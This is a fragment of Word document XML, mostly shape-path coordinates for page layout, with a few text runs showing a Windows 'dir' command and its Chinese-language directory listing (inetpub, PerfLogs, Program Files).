,15442,3026,15447,3026,15451,3026,15455,3026,15459,3026,15464,3026,15468,3026,15473,3026,15477,3026,15482,3026,15487,3026,15492,3026,15497,3026,15502,3026,15507,3026,15513,3026,15518,3026,15524,3026,15529,3026,15535,3026,15541,3026,15547,3026,15553,3026,15559,3026,15565,3026,15572,3026,15572,3026,15572,3026,15572,3026,15572,3026,15572,3026,15572,3026,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3025,15572,3024,15572,3024,15572,3024,15572,3024,15572,3024,15572,3024,15572,3023,15572,3023,15572,3023,15572,3023,15572,3022,15572,3022,15572,3022,15572,3022,15572,3021,15572,3021,15572,3021,15572,3020,15572,3020,15572,3019,15572,3019,15572,3019,15572,3018,15572,3018,15572,3017,15572,3017,15572,3016,15572,3016,15572,3015,15572,3014,15572,3014,15572,3013,15572,3012,15572,3012,15572,3011,15572,3010,15572,3009,15572,3009,15572,3008,15572,3007,15572,3006,15572,3005,15572,3004,15572,3003,15572,3002,15572,3001,15572,3000,15572,2999,15572,2998,15572,2997,15572,2995,15572,2994,15572,2993,15572,2992,15572,2990,15572,2989,15572,2988,15572,2986,15572,2985,15572,2983,15572,2982,15572,2980,15572,2979,15572,2977,15572,2975,15572,2974,15572,2972,15572,2970,15572,2968,15572,2966,15572,2964,15572,2962,15572,2960,15572,2958,15572,2956,15572,2954,15572,2952,15572,2950,15572,2948,15572,2945,15572,2943,15572,2941,15572,2938,15572,2936,15572,2933,15572,2931,15572,2928,15572,2925,15572,2923,15572,2920,15572,2917,15572,2914,15572,2911,15572,2908,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15572,2905,15571,2905,15571,2905,15571,2905,15571,2905,15571,2905,15571,2905,15571,2905,15570,2905,15570,2905,15570,2905,15570,2905,15569,2905,15569,2905,15569,2905,15569,2905,15568,2905,15568,2905,15567,2905,15567,2905,15566,2905,15566,2905,15565,2905,15565,2905,15564,2905,15564,2905,15563,2905,15562,2905,15561,2905,15561,2905,15560,2905,15559,2905,15558,2905,15557,2905,15556,2905,15555,2905,15554,2905,15553,2905,15552,2905,15551,2905,15549,2905,15548,2905,15547,2905,15545,2905,15544,2905,15542,2905,15541,2905,15539,2905,15537,2905,15536,2905,15534,2905,15532,2905,15530,2905,15528,2905,15526,2905,15524,2905,15522,2905,15520,2905,15518,2905,15515,2905,15513,2905,15510,2905,15508,2905,15505,2905,15503,2905,15500,2905,15497,2905,15494,2905,15491,2905,15488,2905,15485,2905,15482,2905,15479,2905,15476,2905,15472,2905,15469,2905,15465,2905,15461,2905,15458,2905,15454,2905,15450,2905,15446,2905,15442,2905,15438,2905,15434,2905,15429,2905,15425,2905,15420,2905,15416,2905,15411,2905,15406,2905,15402,2905,15397,2905,15392,2905,15386,2905,15381,2905,15376,2905,15370,2905,15365,2905,15359,2905,15353,2905,15348,2905,15342,2905,15336,2905,15329,2905,15323,2905,15317e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:764.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,15290" coordsize="130,270">
        <v:shape style="position:absolute;left:4090;top:15290;width:130;height:270" coordorigin="4090,15290" coordsize="130,270" path="m4106,15317l4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4106,15317,4107,15317,4107,15317,4107,15317,4107,15317,4107,15317,4107,15317,4107,15317,4107,15317,4107,15317,4108,15317,4108,15317,4108,15317,4108,15317,4108,15317,4109,15317,4109,15317,4109,15317,4109,15317,4110,15317,4110,15317,4110,15317,4111,15317,4111,15317,4111,15317,4112,15317,4112,15317,4113,15317,4113,15317,4113,15317,4114,15317,4114,15317,4115,15317,4116,15317,4116,15317,4117,15317,4117,15317,4118,15317,4119,15317,4119,15317,4120,15317,4121,15317,4121,15317,4122,15317,4123,15317,4124,15317,4125,15317,4126,15317,4127,15317,4127,15317,4128,15317,4129,15317,4131,15317,4132,15317,4133,15317,4134,15317,4135,15317,4136,15317,4137,15317,4139,15317,4140,15317,4141,15317,4143,15317,4144,15317,4145,15317,4147,15317,4148,15317,4150,15317,4151,15317,4153,15317,4155,15317,4156,15317,4158,15317,4160,15317,4162,15317,4163,15317,4165,15317,4167,15317,4169,15317,4171,15317,4173,15317,4175,15317,4177,15317,4179,15317,4182,15317,4184,15317,4186,15317,4189,15317,4191,15317,4193,15317,4196,15317,4198,15317,4201,15317,4204,15317,4206,15317,4209,15317,4212,15317,4214,15317,4217,15317,4220,15317,4223,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15317,4226,15318,4226,15318,4226,15318,4226,15318,4226,15318,4226,15319,4226,15319,4226,15319,4226,15319,4226,15320,4226,15320,4226,15320,4226,15321,4226,15321,4226,15322,4226,15322,4226,15323,4226,15323,4226,15324,4226,15324,4226,15325,4226,15326,4226,15326,4226,15327,4226,15328,4226,15329,4226,15330,4226,15331,4226,15331,4226,15332,4226,15333,4226,15335,4226,15336,4226,15337,4226,15338,4226,15339,4226,15341,4226,15342,4226,15343,4226,15345,4226,15346,4226,15348,4226,15349,4226,15351,4226,15353,4226,15355,4226,15356,4226,15358,4226,15360,4226,15362,4226,15364,4226,15366,4226,15369,4226,15371,4226,15373,4226,15376,4226,15378,4226,15381,4226,15383,4226,15386,4226,15389,4226,15391,4226,15394,4226,15397,4226,15400,4226,15403,4226,15406,4226,15410,4226,15413,4226,15416,4226,15420,4226,15423,4226,15427,4226,15431,4226,15435,4226,15438,4226,15442,4226,15447,4226,15451,4226,15455,4226,15459,4226,15464,4226,15468,4226,15473,4226,15477,4226,15482,4226,15487,4226,15492,4226,15497,4226,15502,4226,15507,4226,15513,4226,15518,4226,15524,4226,15529,4226,15535,4226,15541,4226,15547,4226,15553,4226,15559,4226,15565,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4226,15572,4225,15572,4225,15572,4225,15572,4225,15572,4225,15572,4225,15572,4225,15572,4225,15572,4224,15572,4224,15572,4224,15572,4224,15572,4224,15572,4223,15572,4223,15572,4223,15572,4223,15572,4222,15572,4222,15572,4222,15572,4221,15572,4221,15572,4220,15572,4220,15572,4220,15572,4219,15572,4219,15572,4218,15572,4218,15572,4217,15572,4217,15572,4216,15572,4216,15572,4215,15572,4214,15572,4214,15572,4213,15572,4212,15572,4211,15572,4211,15572,4210,15572,4209,15572,4208,15572,4207,15572,4207,15572,4206,15572,4205,15572,4204,15572,4203,15572,4202,15572,4201,15572,4200,15572,4198,15572,4197,15572,4196,15572,4195,15572,4194,15572,4192,15572,4191,15572,4190,15572,4188,15572,4187,15572,4185,15572,4184,15572,4182,15572,4181,15572,4179,15572,4178,15572,4176,15572,4174,15572,4172,15572,4171,15572,4169,15572,4167,15572,4165,15572,4163,15572,4161,15572,4159,15572,4157,15572,4155,15572,4153,15572,4151,15572,4148,15572,4146,15572,4144,15572,4141,15572,4139,15572,4136,15572,4134,15572,4131,15572,4129,15572,4126,15572,4123,15572,4121,15572,4118,15572,4115,15572,4112,15572,4109,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15572,4106,15571,4106,15571,4106,15571,4106,15571,4106,15571,4106,15571,4106,15571,4106,15570,4106,15570,4106,15570,4106,15570,4106,15569,4106,15569,4106,15569,4106,15569,4106,15568,4106,15568,4106,15567,4106,15567,4106,15566,4106,15566,4106,15565,4106,15565,4106,15564,4106,15564,4106,15563,4106,15562,4106,15561,4106,15561,4106,15560,4106,15559,4106,15558,4106,15557,4106,15556,4106,15555,4106,15554,4106,15553,4106,15552,4106,15551,4106,15549,4106,15548,4106,15547,4106,15545,4106,15544,4106,15542,4106,15541,4106,15539,4106,15537,4106,15536,4106,15534,4106,15532,4106,15530,4106,15528,4106,15526,4106,15524,4106,15522,4106,15520,4106,15518,4106,15515,4106,15513,4106,15510,4106,15508,4106,15505,4106,15503,4106,15500,4106,15497,4106,15494,4106,15491,4106,15488,4106,15485,4106,15482,4106,15479,4106,15476,4106,15472,4106,15469,4106,15465,4106,15461,4106,15458,4106,15454,4106,15450,4106,15446,4106,15442,4106,15438,4106,15434,4106,15429,4106,15425,4106,15420,4106,15416,4106,15411,4106,15406,4106,15402,4106,15397,4106,15392,4106,15386,4106,15381,4106,15376,4106,15370,4106,15365,4106,15359,4106,15353,4106,15348,4106,15342,4106,15336,4106,15329,4106,15323,4106,15317e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:228.500pt;margin-top:764.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4570,15290" coordsize="130,270">
        <v:shape style="position:absolute;left:4570;top:15290;width:130;height:270" coordorigin="4570,15290" coordsize="130,270" path="m4586,15317l4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4586,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4587,15317,4588,15317,4588,15317,4588,15317,4588,15317,4588,15317,4588,15317,4589,15317,4589,15317,4589,15317,4589,15317,4590,15317,4590,15317,4590,15317,4591,15317,4591,15317,4591,15317,4592,15317,4592,15317,4592,15317,4593,15317,4593,15317,4594,15317,4594,15317,4595,15317,4595,15317,4596,15317,4596,15317,4597,15317,4598,15317,4598,15317,4599,15317,4600,15317,4600,15317,4601,15317,4602,15317,4602,15317,4603,15317,4604,15317,4605,15317,4606,15317,4607,15317,4608,15317,4609,15317,4610,15317,4611,15317,4612,15317,4613,15317,4614,15317,4615,15317,4616,15317,4618,15317,4619,15317,4620,15317,4621,15317,4623,15317,4624,15317,4626,15317,4627,15317,4629,15317,4630,15317,4632,15317,4633,15317,4635,15317,4637,15317,4638,15317,4640,15317,4642,15317,4644,15317,4645,15317,4647,15317,4649,15317,4651,15317,4653,15317,4655,15317,4658,15317,4660,15317,4662,15317,4664,15317,4666,15317,4669,15317,4671,15317,4674,15317,4676,15317,4679,15317,4681,15317,4684,15317,4686,15317,4689,15317,4692,15317,4695,15317,4698,15317,4700,15317,4703,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15317,4706,15318,4706,15318,4706,15318,4706,15318,4706,15318,4706,15319,4706,15319,4706,15319,4706,15319,4706,15320,4706,15320,4706,15320,4706,15321,4706,15321,4706,15322,4706,15322,4706,15323,4706,15323,4706,15324,4706,15324,4706,15325,4706,15326,4706,15326,4706,15327,4706,15328,4706,15329,4706,15330,4706,15331,4706,15331,4706,15332,4706,15333,4706,15335,4706,15336,4706,15337,4706,15338,4706,15339,4706,15341,4706,15342,4706,15343,4706,15345,4706,15346,4706,15348,4706,15349,4706,15351,4706,15353,4706,15355,4706,15356,4706,15358,4706,15360,4706,15362,4706,15364,4706,15366,4706,15369,4706,15371,4706,15373,4706,15376,4706,15378,4706,15381,4706,15383,4706,15386,4706,15389,4706,15391,4706,15394,4706,15397,4706,15400,4706,15403,4706,15406,4706,15410,4706,15413,4706,15416,4706,15420,4706,15423,4706,15427,4706,15431,4706,15435,4706,15438,4706,15442,4706,15447,4706,15451,4706,15455,4706,15459,4706,15464,4706,15468,4706,15473,4706,15477,4706,15482,4706,15487,4706,15492,4706,15497,4706,15502,4706,15507,4706,15513,4706,15518,4706,15524,4706,15529,4706,15535,4706,15541,4706,15547,4706,15553,4706,15559,4706,15565,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4706,15572,4705,15572,4705,15572,4705,15572,4705,15572,4705,15572,4705,15572,4704,15572,4704,15572,4704,15572,4704,15572,4704,15572,4703,15572,4703,15572,4703,15572,4702,15572,4702,15572,4702,15572,4701,15572,4701,15572,4701,15572,4700,15572,4700,15572,4699,15572,4699,15572,4698,15572,4698,15572,4697,15572,4697,15572,4696,15572,4696,15572,4695,15572,4695,15572,4694,15572,4693,15572,4692,15572,4692,15572,4691,15572,4690,15572,4689,15572,4689,15572,4688,15572,4687,15572,4686,15572,4685,15572,4684,15572,4683,15572,4682,15572,4681,15572,4680,15572,4679,15572,4677,15572,4676,15572,4675,15572,4674,15572,4673,15572,4671,15572,4670,15572,4669,15572,4667,15572,4666,15572,4664,15572,4663,15572,4661,15572,4659,15572,4658,15572,4656,15572,4654,15572,4653,15572,4651,15572,4649,15572,4647,15572,4645,15572,4643,15572,4641,15572,4639,15572,4637,15572,4635,15572,4633,15572,4631,15572,4629,15572,4626,15572,4624,15572,4622,15572,4619,15572,4617,15572,4614,15572,4612,15572,4609,15572,4606,15572,4604,15572,4601,15572,4598,15572,4595,15572,4592,15572,4589,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15572,4586,15571,4586,15571,4586,15571,4586,15571,4586,15571,4586,15571,4586,15571,4586,15570,4586,15570,4586,15570,4586,15570,4586,15569,4586,15569,4586,15569,4586,15569,4586,15568,4586,15568,4586,15567,4586,15567,4586,15566,4586,15566,4586,15565,4586,15565,4586,15564,4586,15564,4586,15563,4586,15562,4586,15561,4586,15561,4586,15560,4586,15559,4586,15558,4586,15557,4586,15556,4586,15555,4586,15554,4586,15553,4586,15552,4586,15551,4586,15549,4586,15548,4586,15547,4586,15545,4586,15544,4586,15542,4586,15541,4586,15539,4586,15537,4586,15536,4586,15534,4586,15532,4586,15530,4586,15528,4586,15526,4586,15524,4586,15522,4586,15520,4586,15518,4586,15515,4586,15513,4586,15510,4586,15508,4586,15505,4586,15503,4586,15500,4586,15497,4586,15494,4586,15491,4586,15488,4586,15485,4586,15482,4586,15479,4586,15476,4586,15472,4586,15469,4586,15465,4586,15461,4586,15458,4586,15454,4586,15450,4586,15446,4586,15442,4586,15438,4586,15434,4586,15429,4586,15425,4586,15420,4586,15416,4586,15411,4586,15406,4586,15402,4586,15397,4586,15392,4586,15386,4586,15381,4586,15376,4586,15370,4586,15365,4586,15359,4586,15353,4586,15348,4586,15342,4586,15336,4586,15329,4586,15323,4586,1531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9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9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10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="13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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\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14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>驱动器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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中的卷没有标签。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="8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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>卷的序列号是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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C6F8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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9BAB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="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1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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="16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的目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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6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2017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12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13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DIR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inetpub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2009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07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14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11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DIR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PerfLogs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2017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12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13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03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DIR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Program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Files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2019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09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DIR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Program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Files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x86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141.546pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,2830">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:2830" coordorigin="10402,0" coordsize="0,2830" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,2,10402,3,10402,4,10402,5,10402,6,10402,8,10402,9,10402,11,10402,13,10402,15,10402,17,10402,20,10402,23,10402,26,10402,29,10402,33,10402,36,10402,40,10402,45,10402,50,10402,55,10402,60,10402,66,10402,72,10402,78,10402,85,10402,92,10402,99,10402,107,10402,115,10402,124,10402,133,10402,143,10402,153,10402,163,10402,174,10402,185,10402,197,10402,209,10402,222,10402,236,10402,250,10402,264,10402,279,10402,295,10402,311,10402,327,10402,345,10402,362,10402,381,10402,400,10402,420,10402,440,10402,461,10402,482,10402,505,10402,528,10402,551,10402,576,10402,601,10402,627,10402,653,10402,680,10402,708,10402,737,10402,766,10402,797,10402,828,10402,860,10402,892,10402,926,10402,960,10402,995,10402,1031,10402,1068,10402,1106,10402,1144,10402,1184,10402,1224,10402,1265,10402,1308,10402,1351,10402,1395,10402,1440,10402,1486,10402,1533,10402,1581,10402,1630,10402,1679,10402,1730,10402,1782,10402,1835,10402,1889,10402,1944,10402,2000,10402,2057,10402,2116,10402,2175,10402,2235,10402,2297,10402,2360,10402,2423,10402,2488,10402,2554,10402,2622,10402,2690,10402,2760,10402,2830e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:370" coordorigin="1490,990" coordsize="8990,3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1000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1000l1517,1000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8.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:370" coordorigin="1490,2090" coordsize="8990,37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3,10484,2114,10484,2114,10484,2115,10484,2115,10484,2116,10484,2116,10484,2117,10484,2118,10484,2118,10484,2119,10484,2120,10484,2121,10484,2122,10484,2123,10484,2124,10484,2125,10484,2126,10484,2127,10484,2128,10484,2130,10484,2131,10484,2132,10484,2134,10484,2135,10484,2137,10484,2138,10484,2140,10484,2142,10484,2144,10484,2146,10484,2148,10484,2150,10484,2152,10484,2154,10484,2156,10484,2159,10484,2161,10484,2164,10484,2166,10484,2169,10484,2172,10484,2174,10484,2177,10484,2180,10484,2183,10484,2187,10484,2190,10484,2193,10484,2197,10484,2200,10484,2204,10484,2208,10484,2211,10484,2215,10484,2219,10484,2224,10484,2228,10484,2232,10484,2237,10484,2241,10484,2246,10484,2251,10484,2256,10484,2261,10484,2266,10484,2271,10484,2276,10484,2282,10484,2288,10484,2293,10484,2299,10484,2305,10484,2311,10484,2317,10484,2324,10484,2330,10484,2337,10484,2344,10484,2350,10484,2357,10484,2365,10484,2372,10484,2379,10484,2387,10484,2395,10484,2402,10484,2410,10484,2418,10484,2427,10484,2435,10484,2444,10484,2452,10484,2461,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10483,2470,10482,2470,10482,2470,10480,2470,10479,2470,10477,2470,10475,2470,10473,2470,10470,2470,10466,2470,10462,2470,10458,2470,10453,2470,10448,2470,10442,2470,10435,2470,10428,2470,10419,2470,10411,2470,10401,2470,10391,2470,10379,2470,10367,2470,10354,2470,10340,2470,10326,2470,10310,2470,10293,2470,10275,2470,10256,2470,10236,2470,10215,2470,10192,2470,10168,2470,10143,2470,10117,2470,10090,2470,10061,2470,10031,2470,9999,2470,9966,2470,9931,2470,9895,2470,9858,2470,9819,2470,9778,2470,9735,2470,9691,2470,9646,2470,9598,2470,9549,2470,9498,2470,9445,2470,9391,2470,9334,2470,9275,2470,9215,2470,9153,2470,9088,2470,9022,2470,8953,2470,8883,2470,8810,2470,8735,2470,8658,2470,8578,2470,8497,2470,8413,2470,8326,2470,8238,2470,8146,2470,8053,2470,7957,2470,7859,2470,7758,2470,7654,2470,7548,2470,7439,2470,7328,2470,7214,2470,7097,2470,6977,2470,6855,2470,6730,2470,6602,2470,6471,2470,6337,2470,6201,2470,6061,2470,5918,2470,5773,2470,5624,2470,5472,2470,5317,2470,5159,2470,4997,2470,4833,2470,4665,2470,4494,2470,4319,2470,4141,2470,3960,2470,3776,2470,3587,2470,3396,2470,3201,2470,3002,2470,2800,2470,2594,2470,2385,2470,2172,2470,1955,2470,1734,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2469,1510,2469,1510,2469,1510,2469,1510,2469,1510,2468,1510,2468,1510,2468,1510,2467,1510,2467,1510,2466,1510,2466,1510,2466,1510,2465,1510,2464,1510,2464,1510,2463,1510,2463,1510,2462,1510,2461,1510,2460,1510,2459,1510,2459,1510,2458,1510,2457,1510,2456,1510,2454,1510,2453,1510,2452,1510,2451,1510,2449,1510,2448,1510,2447,1510,2445,1510,2444,1510,2442,1510,2440,1510,2438,1510,2437,1510,2435,1510,2433,1510,2431,1510,2429,1510,2426,1510,2424,1510,2422,1510,2419,1510,2417,1510,2414,1510,2412,1510,2409,1510,2406,1510,2403,1510,2400,1510,2397,1510,2394,1510,2390,1510,2387,1510,2384,1510,2380,1510,2376,1510,2373,1510,2369,1510,2365,1510,2361,1510,2357,1510,2352,1510,2348,1510,2344,1510,2339,1510,2334,1510,2329,1510,2325,1510,2320,1510,2314,1510,2309,1510,2304,1510,2298,1510,2293,1510,2287,1510,2281,1510,2275,1510,2269,1510,2263,1510,2257,1510,2250,1510,2243,1510,2237,1510,2230,1510,2223,1510,2216,1510,2208,1510,2201,1510,2193,1510,2186,1510,2178,1510,2170,1510,2162,1510,2154,1510,2145,1510,2137,1510,2128,1510,2119,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2090;width:30;height:370" coordorigin="1490,2090" coordsize="30,370" path="m1517,2110l1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2112,1517,2112,1517,2112,1517,2112,1517,2113,1517,2113,1517,2113,1517,2114,1517,2114,1517,2115,1517,2115,1517,2116,1517,2116,1517,2117,1517,2118,1517,2118,1517,2119,1517,2120,1517,2121,1517,2122,1517,2123,1517,2124,1517,2125,1517,2126,1517,2127,1517,2128,1517,2130,1517,2131,1517,2132,1517,2134,1517,2135,1517,2137,1517,2138,1517,2140,1517,2142,1517,2144,1517,2146,1517,2148,1517,2150,1517,2152,1517,2154,1517,2156,1517,2159,1517,2161,1517,2164,1517,2166,1517,2169,1517,2172,1517,2174,1517,2177,1517,2180,1517,2183,1517,2187,1517,2190,1517,2193,1517,2197,1517,2200,1517,2204,1517,2208,1517,2211,1517,2215,1517,2219,1517,2224,1517,2228,1517,2232,1517,2237,1517,2241,1517,2246,1517,2251,1517,2256,1517,2261,1517,2266,1517,2271,1517,2276,1517,2282,1517,2288,1517,2293,1517,2299,1517,2305,1517,2311,1517,2317,1517,2324,1517,2330,1517,2337,1517,2344,1517,2350,1517,2357,1517,2365,1517,2372,1517,2379,1517,2387,1517,2395,1517,2402,1517,2410,1517,2418,1517,2427,1517,2435,1517,2444,1517,2452,1517,2461,1517,2470e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:122.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2450" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2450;width:8990;height:370" coordorigin="1490,2450" coordsize="8990,370" path="m1510,2470l1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1511,2470,1512,2470,1512,2470,1514,2470,1515,2470,1517,2470,1519,2470,1521,2470,1524,2470,1528,2470,1532,2470,1536,2470,1541,2470,1546,2470,1552,2470,1559,2470,1566,2470,1575,2470,1583,2470,1593,2470,1603,2470,1615,2470,1627,2470,1640,2470,1654,2470,1668,2470,1684,2470,1701,2470,1719,2470,1738,2470,1758,2470,1780,2470,1802,2470,1826,2470,1851,2470,1877,2470,1904,2470,1933,2470,1963,2470,1995,2470,2028,2470,2063,2470,2099,2470,2136,2470,2175,2470,2216,2470,2259,2470,2303,2470,2348,2470,2396,2470,2445,2470,2496,2470,2549,2470,2604,2470,2660,2470,2719,2470,2779,2470,2841,2470,2906,2470,2972,2470,3041,2470,3112,2470,3184,2470,3259,2470,3336,2470,3416,2470,3498,2470,3582,2470,3668,2470,3757,2470,3848,2470,3941,2470,4037,2470,4136,2470,4236,2470,4340,2470,4446,2470,4555,2470,4666,2470,4780,2470,4897,2470,5017,2470,5139,2470,5264,2470,5392,2470,5523,2470,5657,2470,5793,2470,5933,2470,6076,2470,6222,2470,6370,2470,6522,2470,6677,2470,6835,2470,6997,2470,7161,2470,7329,2470,7500,2470,7675,2470,7853,2470,8034,2470,8219,2470,8407,2470,8598,2470,8793,2470,8992,2470,9194,2470,9400,2470,9609,2470,9823,2470,10039,2470,10260,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2472,10484,2472,10484,2472,10484,2473,10484,2473,10484,2473,10484,2474,10484,2474,10484,2474,10484,2475,10484,2475,10484,2476,10484,2477,10484,2477,10484,2478,10484,2479,10484,2479,10484,2480,10484,2481,10484,2482,10484,2483,10484,2484,10484,2485,10484,2486,10484,2487,10484,2488,10484,2490,10484,2491,10484,2492,10484,2494,10484,2495,10484,2497,10484,2499,10484,2500,10484,2502,10484,2504,10484,2506,10484,2508,10484,2510,10484,2512,10484,2514,10484,2516,10484,2519,10484,2521,10484,2524,10484,2526,10484,2529,10484,2532,10484,2535,10484,2537,10484,2540,10484,2544,10484,2547,10484,2550,10484,2553,10484,2557,10484,2560,10484,2564,10484,2568,10484,2572,10484,2576,10484,2580,10484,2584,10484,2588,10484,2592,10484,2597,10484,2602,10484,2606,10484,2611,10484,2616,10484,2621,10484,2626,10484,2631,10484,2637,10484,2642,10484,2648,10484,2653,10484,2659,10484,2665,10484,2671,10484,2678,10484,2684,10484,2690,10484,2697,10484,2704,10484,2711,10484,2718,10484,2725,10484,2732,10484,2739,104